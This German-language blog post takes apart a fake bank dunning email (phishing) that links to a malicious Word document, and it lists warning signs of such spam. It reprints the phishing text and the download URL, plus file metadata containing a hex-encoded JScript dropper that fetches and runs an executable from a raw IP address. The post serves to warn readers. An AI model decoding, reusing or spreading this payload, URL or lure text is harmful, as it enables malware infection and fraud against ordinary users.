Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Info von ihre Bank

Freitag, 12. August 2016, 15:13 Uhr

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Ich mag es so sehr, da muss ich gleich mal zum Facebook klicken...

Kommentar hinterlassen

Beachten sie vor dem Schreiben eines Kommentares die Datenschutzerklärung für Unser täglich Spam. Wenn sie Wert auf ihre Privatsphäre legen und aus gutem Grund nicht überall ihren Namen und ihre E-Mail-Adresse angeben wollen, machen sie einfach Phantasieangaben.